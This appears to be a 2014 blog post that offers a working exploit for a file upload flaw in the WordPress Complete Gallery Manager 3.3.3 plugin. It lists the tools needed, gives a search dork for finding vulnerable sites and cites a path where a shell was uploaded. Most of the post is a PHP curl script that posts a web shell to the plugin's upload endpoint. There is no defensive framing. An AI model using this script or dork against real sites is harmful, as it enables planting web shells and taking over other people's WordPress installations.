Thursday, 15 May 2014

Exploit Wordpress:Complete Gallery Manager 3.3.3 - File Upload Vulnerability



Things Required:
-XAMPP
-Shell
-Exploit script.php

Dork: inurl/wp-content/plugins/complete-gallery-manager
Shell Uploaded to : http://wordpress.com/wp-content/2013/09/up.php

Exploit :

<?php
$uploadfile="up.php";
$ch =

curl_init("http://wordpress.localhost:8080/wordpress/wp-content/plugins/complete-gallery-manager/frames/upload-images.php");
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS,
array('qqfile'=>"@$uploadfile"));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$postResult = curl_exec($ch);
curl_close($ch);
print "$postResult";

?>
Just watch the video if you still don't understand :)